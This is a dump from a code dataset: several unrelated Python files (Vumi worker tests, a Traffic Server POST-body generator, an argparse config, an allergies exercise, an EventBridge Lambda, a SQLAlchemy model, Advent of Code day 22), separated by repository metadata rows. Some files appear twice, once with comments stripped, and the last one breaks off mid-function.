    def test_hz_default(self):
        # --hz defaults to 60 ticks per second.
        opts = self.mk_opts([])
        self.assertEqual(opts['hz'], 60.0)

    def test_hz_override(self):
        opts = self.mk_opts(["--hz", '10.0'])
        self.assertEqual(opts['hz'], 10.0)

    def test_hz_negative_or_zero(self):
        # Non-positive tick rates are rejected at parse time.
        self.assertRaises(
            usage.UsageError,
            self.mk_opts, ["--hz", "-5.0"])

    def test_hz_not_numeric(self):
        self.assertRaises(
            usage.UsageError,
            self.mk_opts, ["--hz", "foo"])
class TestTicker(VumiTestCase):
    """Tests for Ticker rate limiting, driven by a fake Twisted Clock."""
    def setUp(self):
        self.override_ticker_clock()
    def override_ticker_clock(self):
        # Swap Ticker's reactor for a Clock so the tests control time;
        # the real clock is restored during cleanup.
        orig_clock = Ticker.clock
        def restore_clock():
            Ticker.clock = orig_clock
        Ticker.clock = Clock()
        self.add_cleanup(restore_clock)
    def test_first_tick(self):
        # The very first tick fires as soon as the reactor turns (0 delay).
        t = Ticker(hz=1)
        d1 = t.tick()
        self.assertFalse(d1.called)
        t.clock.advance(0)
        self.assertTrue(d1.called)
    def test_fast(self):
        # Ticking again before the 1s period elapsed must wait out the
        # remainder of the period.
        t = Ticker(hz=1)
        t.tick()
        t.clock.advance(0.1)
        d = t.tick()
        self.assertFalse(d.called)
        t.clock.advance(0.5)
        self.assertFalse(d.called)
        t.clock.advance(0.5)
        self.assertTrue(d.called)
    def test_slow(self):
        # If more than a full period has already passed, the next tick
        # fires on the next reactor turn.
        t = Ticker(hz=1)
        t.tick()
        t.clock.advance(1.5)
        d = t.tick()
        self.assertFalse(d.called)
        t.clock.advance(0)
        self.assertTrue(d.called)
class TestJsBoxSend(VumiTestCase):
    """Integration tests for JsBoxSendWorker using in-memory vumi helpers."""
    @inlineCallbacks
    def setUp(self):
        self.vumi_helper = yield self.add_helper(VumiApiHelper())
        self.user_helper = yield self.vumi_helper.get_or_create_user()
        self.msg_helper = yield self.add_helper(
            GoMessageHelper(self.vumi_helper))
    # Builds the worker under test with stdout captured for assertions.
    @inlineCallbacks
    def get_worker(self):
        vumigo_config = self.vumi_helper.mk_config({})
        worker_helper = self.vumi_helper.get_worker_helper()
        worker = yield worker_helper.get_worker(JsBoxSendWorker, vumigo_config)
        worker.stdout = StringIO()
        returnValue(worker)
    @inlineCallbacks
    def test_get_conversation_jsbox(self):
        conv = yield self.user_helper.create_conversation(u'jsbox')
        worker = yield self.get_worker()
        loaded_conv = yield worker.get_conversation(
            self.user_helper.account_key, conv.key)
        self.assertEqual(conv.key, loaded_conv.key)
    @inlineCallbacks
    def test_get_conversation_dialogue(self):
        conv = yield self.user_helper.create_conversation(u'dialogue')
        worker = yield self.get_worker()
        loaded_conv = yield worker.get_conversation(
            self.user_helper.account_key, conv.key)
        self.assertEqual(conv.key, loaded_conv.key)
    # Only jsbox/dialogue conversations are supported; others raise.
    @inlineCallbacks
    def test_get_conversation_unsupported_type(self):
        conv = yield self.user_helper.create_conversation(u'bulk_send')
        worker = yield self.get_worker()
        failure = yield self.assertFailure(worker.get_conversation(
            self.user_helper.account_key, conv.key), ScriptError)
        self.assertEqual(
            str(failure), "Unsupported conversation type: bulk_send")
    # The delivery class is read from conversation-type-specific config.
    @inlineCallbacks
    def test_get_delivery_class_jsbox(self):
        conv = yield self.user_helper.create_conversation(
            u'jsbox',
            config={
                'jsbox_app_config': {
                    'config': {
                        'key': 'config',
                        'value': json.dumps({
                            'delivery_class': 'twitter',
                        })
                    },
                },
            })
        worker = yield self.get_worker()
        self.assertEqual(worker.get_delivery_class(conv), 'twitter')
    @inlineCallbacks
    def test_get_delivery_class_dialogue(self):
        conv = yield self.user_helper.create_conversation(
            u'dialogue',
            config={
                'poll': {
                    'poll_metadata': {
                        'delivery_class': 'mxit',
                    },
                },
            })
        worker = yield self.get_worker()
        self.assertEqual(worker.get_delivery_class(conv), 'mxit')
    @inlineCallbacks
    def test_get_conversation_missing(self):
        worker = yield self.get_worker()
        failure = yield self.assertFailure(worker.get_conversation(
            self.user_helper.account_key, u'badkey'), ScriptError)
        self.assertEqual(str(failure), "Conversation not found: badkey")
    @inlineCallbacks
    def test_send_to_conv_jsbox(self):
        conv = yield self.user_helper.create_conversation(u'jsbox')
        worker = yield self.get_worker()
        worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
        msg = self.msg_helper.make_inbound('foo')
        self.assertEqual(worker_helper.get_dispatched_inbound(), [])
        worker.send_to_conv(conv, msg)
        self.assertEqual(worker_helper.get_dispatched_inbound(), [msg])
    @inlineCallbacks
    def test_send_to_conv_dialogue(self):
        conv = yield self.user_helper.create_conversation(u'dialogue')
        worker = yield self.get_worker()
        worker_helper = self.vumi_helper.get_worker_helper(
            'dialogue_transport')
        msg = self.msg_helper.make_inbound('foo')
        self.assertEqual(worker_helper.get_dispatched_inbound(), [])
        worker.send_to_conv(conv, msg)
        self.assertEqual(worker_helper.get_dispatched_inbound(), [msg])
    # The trigger is logged to stdout and dispatched as an inbound message
    # flagged with inbound_push_trigger.
    @inlineCallbacks
    def test_send_inbound_push_trigger(self):
        conv = yield self.user_helper.create_conversation(u'jsbox')
        worker = yield self.get_worker()
        worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
        self.assertEqual(worker_helper.get_dispatched_inbound(), [])
        self.assertEqual(worker.stdout.getvalue(), '')
        yield worker.send_inbound_push_trigger('+27831234567', conv)
        self.assertEqual(
            worker.stdout.getvalue(),
            "Starting u'My Conversation' [%s] -> +27831234567\n" % (conv.key,))
        [msg] = worker_helper.get_dispatched_inbound()
        self.assertEqual(msg['inbound_push_trigger'], True)
        self.assertEqual(msg['from_addr'], '+27831234567')
    @inlineCallbacks
    def test_get_excluded_addrs_no_file(self):
        worker = yield self.get_worker()
        excluded_addrs = worker.get_excluded_addrs(None)
        self.assertEqual(excluded_addrs, set())
    @inlineCallbacks
    def test_get_excluded_addrs_simple(self):
        exclude_file = NamedTemporaryFile()
        exclude_file.write('addr1\naddr2')
        exclude_file.flush()
        worker = yield self.get_worker()
        excluded_addrs = worker.get_excluded_addrs(exclude_file.name)
        self.assertEqual(excluded_addrs, set(['addr1', 'addr2']))
    # Whitespace and duplicate entries in the exclusion file are normalised.
    @inlineCallbacks
    def test_get_excluded_addrs_messy(self):
        exclude_file = NamedTemporaryFile()
        exclude_file.write('addr1 \naddr2\n\naddr1\n\taddr3\n')
        exclude_file.flush()
        worker = yield self.get_worker()
        excluded_addrs = worker.get_excluded_addrs(exclude_file.name)
        self.assertEqual(excluded_addrs, set(['addr1', 'addr2', 'addr3']))
    @inlineCallbacks
    def test_get_contacts_for_addrs_no_groups(self):
        conv = yield self.user_helper.create_conversation(u'jsbox')
        worker = yield self.get_worker()
        addrs = yield worker.get_contact_addrs_for_conv(conv, None, set())
        self.assertEqual(addrs, [])
        self.assertEqual(worker.stdout.getvalue(), '')
    @inlineCallbacks
    def test_get_contacts_for_addrs_small_group(self):
        cs = self.user_helper.user_api.contact_store
        grp = yield cs.new_group(u'group')
        contacts = [
            (yield cs.new_contact(msisdn=u'+01', groups=[grp])),
            (yield cs.new_contact(msisdn=u'+02', groups=[grp])),
            (yield cs.new_contact(msisdn=u'+03', groups=[grp])),
        ]
        conv = yield self.user_helper.create_conversation(
            u'jsbox', groups=[grp])
        worker = yield self.get_worker()
        addrs = yield worker.get_contact_addrs_for_conv(conv, None, set())
        self.assertEqual(
            sorted(addrs), sorted([c.msisdn for c in contacts]))
        self.assertEqual(worker.stdout.getvalue(), 'Addresses collected: 3\n')
    # With an explicit delivery class, addresses come from that field.
    @inlineCallbacks
    def test_get_contacts_for_addrs_gtalk(self):
        cs = self.user_helper.user_api.contact_store
        grp = yield cs.new_group(u'group')
        contacts = [
            (yield cs.new_contact(msisdn=u'', gtalk_id=u'1@a', groups=[grp])),
            (yield cs.new_contact(msisdn=u'', gtalk_id=u'2@a', groups=[grp])),
            (yield cs.new_contact(msisdn=u'', gtalk_id=u'3@a', groups=[grp])),
        ]
        conv = yield self.user_helper.create_conversation(
            u'jsbox', groups=[grp])
        worker = yield self.get_worker()
        addrs = yield worker.get_contact_addrs_for_conv(conv, 'gtalk', set())
        self.assertEqual(sorted(addrs), sorted([c.gtalk_id for c in contacts]))
    @inlineCallbacks
    def test_get_contacts_for_addrs_exclude_list(self):
        cs = self.user_helper.user_api.contact_store
        grp = yield cs.new_group(u'group')
        yield cs.new_contact(msisdn=u'+01', groups=[grp])
        yield cs.new_contact(msisdn=u'+02', groups=[grp])
        yield cs.new_contact(msisdn=u'+03', groups=[grp])
        conv = yield self.user_helper.create_conversation(
            u'jsbox', groups=[grp])
        worker = yield self.get_worker()
        excluded = set(['+02', '+04'])
        addrs = yield worker.get_contact_addrs_for_conv(conv, None, excluded)
        self.assertEqual(sorted(addrs), ['+01', '+03'])
        self.assertEqual(worker.stdout.getvalue(), 'Addresses collected: 2\n')
    @inlineCallbacks
    def test_send_jsbox_default_delivery_class(self):
        cs = self.user_helper.user_api.contact_store
        grp = yield cs.new_group(u'group')
        contacts = [
            (yield cs.new_contact(msisdn=u'+01', groups=[grp])),
            (yield cs.new_contact(msisdn=u'+02', groups=[grp])),
            (yield cs.new_contact(msisdn=u'+03', groups=[grp])),
        ]
        conv = yield self.user_helper.create_conversation(
            u'jsbox', groups=[grp])
        worker = yield self.get_worker()
        worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
        self.assertEqual(worker_helper.get_dispatched_inbound(), [])
        yield worker.send_jsbox(self.user_helper.account_key, conv.key)
        msgs = worker_helper.get_dispatched_inbound()
        msg_addrs = sorted(msg['from_addr'] for msg in msgs)
        self.assertEqual(msg_addrs, [c.msisdn for c in contacts])
        self.assertTrue(all(msg['inbound_push_trigger'] for msg in msgs))
    @inlineCallbacks
    def test_send_jsbox_gtalk(self):
        cs = self.user_helper.user_api.contact_store
        grp = yield cs.new_group(u'group')
        contacts = [
            (yield cs.new_contact(msisdn=u'', gtalk_id=u'1@a', groups=[grp])),
            (yield cs.new_contact(msisdn=u'', gtalk_id=u'2@a', groups=[grp])),
            (yield cs.new_contact(msisdn=u'', gtalk_id=u'3@a', groups=[grp])),
        ]
        conv = yield self.user_helper.create_conversation(
            u'jsbox', groups=[grp], config={'jsbox_app_config': {'config': {
                'key': 'config',
                'value': json.dumps({'delivery_class': 'gtalk'}),
            }}})
        worker = yield self.get_worker()
        worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
        self.assertEqual(worker_helper.get_dispatched_inbound(), [])
        yield worker.send_jsbox(self.user_helper.account_key, conv.key)
        msgs = worker_helper.get_dispatched_inbound()
        msg_addrs = sorted(msg['from_addr'] for msg in msgs)
        self.assertEqual(msg_addrs, [c.gtalk_id for c in contacts])
        self.assertTrue(all(msg['inbound_push_trigger'] for msg in msgs))
    # Progress is reported every 100 messages for large sends.
    @inlineCallbacks
    def test_send_jsbox_big_group(self):
        conv = yield self.user_helper.create_conversation(u'jsbox')
        worker = yield self.get_worker()
        def generate_contact_addrs(conv, delivery_class, excluded_addrs):
            # NOTE(review): '%03s' pads with spaces, not zeros — '%03d' may
            # have been intended; harmless here since addresses are stubs.
            return ['+27831234%03s' % i for i in xrange(1000)]
        worker.get_contact_addrs_for_conv = generate_contact_addrs
        worker.send_inbound_push_trigger = lambda to_addr, conversation: None
        yield worker.send_jsbox(self.user_helper.account_key, conv.key, 1000)
        self.assertEqual(worker.stdout.getvalue(), ''.join([
            'Messages sent: 100 / 1000\n',
            'Messages sent: 200 / 1000\n',
            'Messages sent: 300 / 1000\n',
            'Messages sent: 400 / 1000\n',
            'Messages sent: 500 / 1000\n',
            'Messages sent: 600 / 1000\n',
            'Messages sent: 700 / 1000\n',
            'Messages sent: 800 / 1000\n',
            'Messages sent: 900 / 1000\n',
            'Messages sent: 1000 / 1000\n',
        ]))
| true | true |
1c3c971c42ddcc733dc1be76b59663b71a00c80c | 948 | py | Python | tests/gold_tests/post_error/create_post_body.py | zhangzhongkui/http-over-http | 18e27573e3338ee797648c44d7e01114e1d3321c | [
"Apache-2.0"
] | null | null | null | tests/gold_tests/post_error/create_post_body.py | zhangzhongkui/http-over-http | 18e27573e3338ee797648c44d7e01114e1d3321c | [
"Apache-2.0"
] | 2 | 2017-03-14T02:29:31.000Z | 2017-09-22T22:11:35.000Z | tests/gold_tests/post_error/create_post_body.py | zhangzhongkui/http-over-http | 18e27573e3338ee797648c44d7e01114e1d3321c | [
"Apache-2.0"
] | 1 | 2021-02-15T08:09:17.000Z | 2021-02-15T08:09:17.000Z | '''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Build the "postbody" fixture: 3000 repetitions of "123456" left-padded
# with zeros to 1024 characters (~3 MB total) for the POST-error test.
post_body = str(123456).zfill(1024)
# Fix: use a context manager so the handle is closed even if a write fails
# (the original leaked the file object on error).
with open("postbody", "w") as postfile:
    for x in range(0, 3000):
        postfile.write(post_body)
| 37.92 | 75 | 0.744726 |
# Write the 3 MB "postbody" fixture: 3000 chunks of "123456" zero-padded
# to 1024 characters each.
post_body = str(123456).zfill(1024)
with open("postbody", "w") as postfile:  # fix: close the handle even on error
    for x in range(0, 3000):
        postfile.write(post_body)
| true | true |
1c3c9765d3a2070ba96ffc8effcb94d0d13baea5 | 4,400 | py | Python | rc/utils/argsParser.py | RowitZou/Q-Net | d1637c8164f807d51f2185c4f06515b7ac2e029c | [
"MIT"
] | 6 | 2019-02-13T07:00:25.000Z | 2020-12-04T06:28:41.000Z | rc/utils/argsParser.py | RowitZou/RNet-PGNet | d1637c8164f807d51f2185c4f06515b7ac2e029c | [
"MIT"
] | 1 | 2018-11-25T12:33:28.000Z | 2018-11-25T12:33:28.000Z | rc/utils/argsParser.py | RowitZou/Q-Net | d1637c8164f807d51f2185c4f06515b7ac2e029c | [
"MIT"
] | 1 | 2021-06-22T13:27:27.000Z | 2021-06-22T13:27:27.000Z | # -*- coding: utf8 -*-
import argparse
################################################################################
# ArgParse and Helper Functions #
################################################################################
def str2bool(v):
    """argparse ``type=`` helper: map a yes/no style string to a bool.

    Accepts (case-insensitively) yes/true/t/y/1 and no/false/f/n/0;
    anything else raises ``argparse.ArgumentTypeError``.
    """
    value = v.lower()
    if value in ('yes', 'true', 't', 'y', '1'):
        return True
    if value in ('no', 'false', 'f', 'n', '0'):
        return False
    raise argparse.ArgumentTypeError('Boolean value expected.')
def get_args():
    """Parse command-line arguments for training/evaluation.

    Returns the parsed options as a plain ``dict`` (via ``vars`` on the
    argparse Namespace). Option groups: data/session options, model
    architecture ('model_spec') and training/optimizer ('training_spec').
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--trainset', type=str, default=None, help='Training set')
    parser.add_argument('--devset', type=str, default=None, help='Dev set')
    parser.add_argument('--testset', type=str, default=None, help='Test set')
    parser.add_argument('--dir', type=str, default=None, help='Set the name of the models directory for this session.')
    parser.add_argument('--pretrained', type=str, default=None, help='Specify pretrained models directory.')
    parser.add_argument('--random_seed', type=int, default=123, help='Random seed')
    parser.add_argument('--n_history', type=int, default=0)
    parser.add_argument('--min_freq', type=int, default=1)
    parser.add_argument('--split_history', type=str2bool, default=False)
    # Model architecture hyper-parameters.
    group = parser.add_argument_group('model_spec')
    group.add_argument('--max_word_length', type=int, default=5, help='Set maximum word length.')
    group.add_argument('--embed_file', type=str, default=None)
    group.add_argument('--embed_size', type=int, default=None)
    group.add_argument('--embed_type', type=str, default='glove', choices=['glove', 'word2vec', 'fasttext'])
    group.add_argument('--hidden_size', type=int, default=120, help='Set hidden size.')
    group.add_argument('--rnn_hidden_size', type=int, default=120, help='Set sentence encoder hidden size.')
    group.add_argument('--sent_rnn_layers', type=int, default=3, help='Set sentence RNN encoder layers.')
    group.add_argument('--sum_loss', type=str2bool, default=False, help="Set the type of loss.")
    group.add_argument('--fix_embeddings', type=str2bool, default=True, help='Whether to fix embeddings.')
    group.add_argument('--dropout_rnn', type=float, default=0.3, help='Set RNN dropout in reader.')
    group.add_argument('--dropout_emb', type=float, default=0.5, help='Set dropout for all feedforward layers.')
    group.add_argument('--use_multi_gpu', type=str2bool, default=False, help='Whether to use multiple gpus.')
    group.add_argument('--use_elmo', type=str2bool, default=True, help='Whether to use elmo word embeddings.')
    group.add_argument('--elmo_fine_tune', type=str2bool, default=False, help="Whether to fine-tune the elmo model.")
    group.add_argument('--elmo_options', type=str, default='elmo/elmo_options_512.json')
    group.add_argument('--elmo_weights', type=str, default='elmo/elmo_weights_512.hdf5')
    # Training / optimizer hyper-parameters.
    group = parser.add_argument_group('training_spec')
    group.add_argument('--optimizer', type=str, default='adamax', help='Set optimizer.')
    group.add_argument('--learning_rate', type=float, default=0.1, help='Set learning rate for SGD.')
    group.add_argument('--grad_clipping', type=float, default=10.0, help='Whether to use grad clipping.')
    group.add_argument('--weight_decay', type=float, default=0.0, help='Set weight decay.')
    group.add_argument('--momentum', type=float, default=0.0, help='Set momentum.')
    group.add_argument('--batch_size', type=int, default=32, help='Set batch size.')
    group.add_argument('--max_epochs', type=int, default=20, help='Set number of total epochs.')
    group.add_argument('--verbose', type=int, default=100, help='Print every X batches.')
    group.add_argument('--shuffle', type=str2bool, default=True,
                       help='Whether to shuffle the examples during training.')
    group.add_argument('--max_answer_len', type=int, default=15, help='Set max answer length for decoding.')
    group.add_argument('--predict_train', type=str2bool, default=True, help='Whether to predict on training set.')
    group.add_argument('--out_predictions', type=str2bool, default=True, help='Whether to output predictions.')
    group.add_argument('--save_params', type=str2bool, default=True, help='Whether to save params.')
    args = parser.parse_args()
    # Expose the options as a dict rather than a Namespace.
    return vars(args)
| 61.971831 | 119 | 0.68 |
import argparse
| true | true |
1c3c9783b1a7b7ea4fe1f04b17ec8c19a6fe0284 | 498 | py | Python | exercise/Exercism/python/allergies/allergies.py | orca-j35/python-notes | 950e78f53c5eebe8a4ba0396d5470383cfa77e48 | [
"CNRI-Python"
] | 1 | 2021-05-08T16:04:09.000Z | 2021-05-08T16:04:09.000Z | exercise/Exercism/python/allergies/allergies.py | orca-j35/python-notes | 950e78f53c5eebe8a4ba0396d5470383cfa77e48 | [
"CNRI-Python"
] | null | null | null | exercise/Exercism/python/allergies/allergies.py | orca-j35/python-notes | 950e78f53c5eebe8a4ba0396d5470383cfa77e48 | [
"CNRI-Python"
class Allergies(object):
    """Decode an integer allergy score into allergen names via bit flags."""

    # Allergen name -> bit flag within the score.
    items = {
        'eggs': 1,
        'peanuts': 2,
        'shellfish': 4,
        'strawberries': 8,
        'tomatoes': 16,
        'chocolate': 32,
        'pollen': 64,
        'cats': 128,
    }

    def __init__(self, score):
        self._score = score

    def is_allergic_to(self, item):
        """True if ``item``'s bit is set in the score (unknown items: False)."""
        flag = Allergies.items.get(item, 0)
        return bool(flag & self._score)

    @property
    def lst(self):
        """All allergen names whose bit is set in the score."""
        return [name for name, flag in Allergies.items.items()
                if flag & self._score]
class Allergies(object):
    """Interpret an allergy score as a set of allergen bit flags."""

    items = {
        'eggs': 1,
        'peanuts': 2,
        'shellfish': 4,
        'strawberries': 8,
        'tomatoes': 16,
        'chocolate': 32,
        'pollen': 64,
        'cats': 128,
    }

    def __init__(self, score):
        # Raw bitmask; each set bit marks one allergen from ``items``.
        self._score = score

    def is_allergic_to(self, item):
        """Return True when the bit for ``item`` is present in the score."""
        return bool(Allergies.items.get(item, 0) & self._score)

    @property
    def lst(self):
        """Allergen names encoded in the score, in ``items`` order."""
        result = []
        for name, flag in Allergies.items.items():
            if flag & self._score:
                result.append(name)
        return result
| true | true |
1c3c987ff18f75bc78d577a2387d1cd2e1da6e79 | 574 | py | Python | logistica/commands/despacho_incluir_pendente.py | epiresdasilva/ecommerce-eventbridge | 33ec335ee2e946da7101a60746b6c3aa75f2a984 | [
"Apache-2.0"
] | 2 | 2021-10-30T01:32:04.000Z | 2021-11-06T20:22:39.000Z | logistica/commands/despacho_incluir_pendente.py | epiresdasilva/ecommerce-eventbridge | 33ec335ee2e946da7101a60746b6c3aa75f2a984 | [
"Apache-2.0"
] | null | null | null | logistica/commands/despacho_incluir_pendente.py | epiresdasilva/ecommerce-eventbridge | 33ec335ee2e946da7101a60746b6c3aa75f2a984 | [
"Apache-2.0"
] | null | null | null | import json
import boto3
# Shared EventBridge client, created once per Lambda container.
client = boto3.client('events')
def main(event, context):
    """Lambda handler: publish a 'Despacho Incluido' event to EventBridge.

    Returns an API-Gateway-style dict with the PutEvents response as body.
    """
    # NOTE(review): logs event["detail"] but publishes event["body"] below —
    # confirm which field is actually intended.
    print("Despacho Incluir Pendencia: ", str(event["detail"]))
    event_response = client.put_events(
        Entries=[
            {
                'Source': 'DespachoIncluido',
                'DetailType': 'Despacho Incluido',
                # NOTE(review): str() yields a Python repr (single quotes),
                # not JSON; EventBridge 'Detail' is expected to be valid
                # JSON — json.dumps may be intended. Verify consumers.
                'Detail': str(event["body"]),
                'EventBusName': 'ecommerce-event-bridge-bus'
            },
        ]
    )
    response = {
        "statusCode": 200,
        "body": json.dumps(event_response)
    }
    return response
| 20.5 | 63 | 0.533101 | import json
import boto3
# Shared EventBridge client, created once per Lambda container.
client = boto3.client('events')
def main(event, context):
    """Lambda handler: publish a 'Despacho Incluido' event to EventBridge.

    Returns an API-Gateway-style dict with the PutEvents response as body.
    """
    # NOTE(review): logs event["detail"] but publishes event["body"] below —
    # confirm which field is actually intended.
    print("Despacho Incluir Pendencia: ", str(event["detail"]))
    event_response = client.put_events(
        Entries=[
            {
                'Source': 'DespachoIncluido',
                'DetailType': 'Despacho Incluido',
                # NOTE(review): str() yields a Python repr, not JSON;
                # json.dumps may be intended here — verify consumers.
                'Detail': str(event["body"]),
                'EventBusName': 'ecommerce-event-bridge-bus'
            },
        ]
    )
    response = {
        "statusCode": 200,
        "body": json.dumps(event_response)
    }
    return response
| true | true |
1c3c98f9b4e64eb252bfe2dc0f227ef565664c46 | 633 | py | Python | database/order_history.py | rirwin/stock-analysis | d13b9be86265ad87c10847422a04f93409b0bf51 | [
"Apache-2.0"
] | null | null | null | database/order_history.py | rirwin/stock-analysis | d13b9be86265ad87c10847422a04f93409b0bf51 | [
"Apache-2.0"
] | 1 | 2020-06-24T04:41:59.000Z | 2020-06-24T04:41:59.000Z | database/order_history.py | rirwin/stock_analysis | d13b9be86265ad87c10847422a04f93409b0bf51 | [
"Apache-2.0"
] | null | null | null | from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column
from sqlalchemy import Float
from sqlalchemy import Integer
from sqlalchemy import String
Base = declarative_base()
class OrderHistory(Base):
    """Declarative ORM model for one recorded order.

    Every column except ``price`` participates in the composite primary
    key, so duplicate rows are only rejected when user, type, date,
    ticker and share count all coincide.
    """
    __tablename__ = 'order_history'
    user_id = Column(Integer, primary_key=True)
    order_type = Column(String, primary_key=True)  # presumably 'buy'/'sell' -- TODO confirm against writers
    date = Column(Integer, primary_key=True)  # integer-encoded date -- epoch or YYYYMMDD; verify with callers
    ticker = Column(String, primary_key=True)
    num_shares = Column(Integer, primary_key=True)
    price = Column(Float)
if __name__ == "__main__":
from database import db
Base.metadata.create_all(db.engine)
| 24.346154 | 55 | 0.758294 | from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column
from sqlalchemy import Float
from sqlalchemy import Integer
from sqlalchemy import String
Base = declarative_base()
class OrderHistory(Base):
__tablename__ = 'order_history'
user_id = Column(Integer, primary_key=True)
order_type = Column(String, primary_key=True)
date = Column(Integer, primary_key=True)
ticker = Column(String, primary_key=True)
num_shares = Column(Integer, primary_key=True)
price = Column(Float)
if __name__ == "__main__":
from database import db
Base.metadata.create_all(db.engine)
| true | true |
1c3c99725a0eeee266934c4830273f321e9b9aec | 4,857 | py | Python | day22/day22.py | lukasHD/adventOfCode2020 | fa171f3ad8232a0542d544d3de9b2b9d8fdf8ccd | [
"MIT"
] | null | null | null | day22/day22.py | lukasHD/adventOfCode2020 | fa171f3ad8232a0542d544d3de9b2b9d8fdf8ccd | [
"MIT"
] | null | null | null | day22/day22.py | lukasHD/adventOfCode2020 | fa171f3ad8232a0542d544d3de9b2b9d8fdf8ccd | [
"MIT"
] | null | null | null | import sys
import inspect
from codetiming import Timer
sys.path.insert(0, 'D:\\projects\\aoc2020\\')
from helper import loadingUtils, pretty
DAY = 22
def get_path():
    """Return this day's input directory name, e.g. 'day22'."""
    return "day%02d" % DAY
def parse(in_arr):
    """Split the raw input lines into the two players' starting decks.

    The first line (player 1's header) is skipped outright; the second
    line containing "Player" switches accumulation to the second deck.
    Blank lines are ignored; any non-numeric card line raises ValueError.
    """
    deck_one = []
    deck_two = []
    target = deck_one
    for line in in_arr[1:]:
        if not line:
            continue
        if "Player" in line:
            target = deck_two
            continue
        try:
            target.append(int(line))
        except ValueError:
            raise ValueError("smthg went wrong")
    return deck_one, deck_two
def play(p1, p2, debug):
    """Play regular Combat until one deck is empty; return the winner's deck.

    Both input decks are consumed/mutated in place.
    """
    round_no = 1
    while p1 and p2:
        if debug: print("Round {:3}".format(round_no))
        top1 = p1.pop(0)
        top2 = p2.pop(0)
        # Higher card wins; winner keeps their own card on top.
        if top1 > top2:
            if debug: print("Player 1 wins this round!")
            p1 += [top1, top2]
        else:
            if debug: print("Player 2 wins this round!")
            p2 += [top2, top1]
        round_no += 1
    return p1 if p1 else p2
def play_advanced(_p1, _p2, debug):
    """Play Recursive Combat and return ``(winner, winning_deck)``.

    ``winner`` is 1 or 2.  The input decks are copied, so the caller's
    lists are left untouched.
    """
    p1 = _p1.copy()
    p2 = _p2.copy()
    # Set instead of list: membership is the only operation performed,
    # and O(1) lookups avoid quadratic behavior on long games.
    previous_rounds = set()
    step = 1
    while len(p1) > 0 and len(p2) > 0:
        if debug: print("Round {:3}".format(step))
        # Infinite-game guard: if this exact deck configuration already
        # occurred in this game, player 1 wins the whole game instantly.
        # (Previous rounds from other/sub-games are not considered.)
        hashed = str(p1) + ";" + str(p2)
        if hashed in previous_rounds:
            if debug: print("Player 1 is declared the winner! Stop infinity!")
            return 1, p1
        previous_rounds.add(hashed)
        # Each player draws their top card as normal.
        v1 = p1.pop(0)
        v2 = p2.pop(0)
        if len(p1) >= v1 and len(p2) >= v2:
            # Both players have at least as many cards left as the value
            # drawn: the round is decided by a recursive sub-game played
            # on copies of the next v1/v2 cards.
            if debug: print("Recursive Combat")
            new_p1 = p1[:v1]
            new_p2 = p2[:v2]
            winner, _ = play_advanced(new_p1, new_p2, debug)
        else:
            # Otherwise the higher card wins, as in regular Combat.
            if v1 > v2:
                if debug: print("Player 1 wins this round!")
                winner = 1
            else:
                if debug: print("Player 2 wins this round!")
                winner = 2
        # The round winner takes both cards, their own on top.
        if winner == 1:
            p1.append(v1)
            p1.append(v2)
        else:
            p2.append(v2)
            p2.append(v1)
        step += 1  # bug fix: the round counter was never advanced before
    if len(p1) == 0:
        return 2, p2
    else:
        return 1, p1
@Timer()
def run_part_1(in_file: str, debug: bool = False) -> int:
    """Solve part 1: play regular Combat and score the winning deck."""
    pretty.printHeader(DAY, 1, inspect.stack()[0].function, in_file)
    p1, p2 = parse(loadingUtils.importToArray(in_file))
    print(p1)
    print(p2)
    winner = play(p1, p2, debug)
    print(winner)
    winner.reverse()
    # Score: bottom card counts once, the next twice, and so on.
    result = sum(pos * card for pos, card in enumerate(winner, start=1))
    print("Result = {}".format(result))
    return result
@Timer()
def run_part_2(in_file: str, debug: bool = False) -> int:
    """Solve part 2: play Recursive Combat and score the winning deck."""
    pretty.printHeader(DAY, 2, inspect.stack()[0].function, in_file)
    p1, p2 = parse(loadingUtils.importToArray(in_file))
    _, winner = play_advanced(p1, p2, debug)
    print(winner)
    winner.reverse()
    # Score: bottom card counts once, the next twice, and so on.
    result = sum(pos * card for pos, card in enumerate(winner, start=1))
    print("Result = {}".format(result))
    return result
if __name__ == "__main__":
    # Run each part against the sample input(s) with debug output on,
    # then against the real puzzle input.
    run_part_1(get_path() + "/test1", True)
    run_part_1(get_path() + "/input1")
    run_part_2(get_path() + "/test2", True)
    run_part_2(get_path() + "/test1", True)
    run_part_2(get_path() + "/input1")
| 30.936306 | 95 | 0.560222 | import sys
import inspect
from codetiming import Timer
sys.path.insert(0, 'D:\\projects\\aoc2020\\')
from helper import loadingUtils, pretty
DAY = 22
def get_path():
return "day{:02d}".format(DAY)
def parse(in_arr):
p1 = []
p2 = []
player1 = True
for line in in_arr[1:]:
if line == "":
continue
if "Player" in line:
player1 = False
continue
try:
a = int(line)
if player1:
p1.append(a)
else:
p2.append(a)
except ValueError:
raise ValueError("smthg went wrong")
return p1, p2
def play(p1,p2, debug):
step = 1
while len(p1) > 0 and len(p2) > 0:
if debug: print("Round {:3}".format(step))
v1 = p1.pop(0)
v2 = p2.pop(0)
if v1 > v2:
if debug: print("Player 1 wins this round!")
p1.append(v1)
p1.append(v2)
else:
if debug: print("Player 2 wins this round!")
p2.append(v2)
p2.append(v1)
step += 1
if len(p1) == 0:
return p2
else:
return p1
def play_advanced(_p1, _p2, debug):
p1 = _p1.copy()
p2 = _p2.copy()
previous_rounds = []
step = 1
while len(p1) > 0 and len(p2) > 0:
if debug: print("Round {:3}".format(step))
hashed = str(p1) + ";" + str(p2)
if hashed in previous_rounds:
if debug: print("Player 1 is declared the winner! Stop infinity!")
return 1, p1
else:
previous_rounds.append(hashed)
v1 = p1.pop(0)
